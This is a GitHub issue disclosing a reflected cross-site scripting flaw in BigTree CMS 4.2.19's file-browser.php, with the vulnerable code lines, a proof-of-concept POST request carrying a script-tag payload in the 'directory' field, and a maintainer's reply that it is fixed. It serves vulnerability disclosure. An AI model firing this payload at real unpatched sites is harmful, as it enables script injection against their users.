Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross-site Scripting in bigtreecms 4.2.19 #327

Closed
phantom0301 opened this issue Jan 22, 2018 · 1 comment
Closed

Cross-site Scripting in bigtreecms 4.2.19 #327

phantom0301 opened this issue Jan 22, 2018 · 1 comment

Comments

@phantom0301
Copy link

phantom0301 commented Jan 22, 2018

FILE:
core/admin/ajax/developer/extensions/file-browser.php

Vul Code:
$parts = explode("/",$_POST["directory"]); ->
$postdirectory[] = $part; ->
$directory = SERVER_ROOT.$postdirectory; ->

PoC:
POST /core/admin/ajax/developer/extensions/file-browser.php
xxx: xxx
xxx: xxx
xxx: xxx

cloud_disabled=1&location=server&directory=<script>alert(123)</script>

timbuckingham added a commit that referenced this issue Feb 14, 2018
@timbuckingham
Copy link
Collaborator

Thanks for the report, should be fixed in 4.2-devel!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants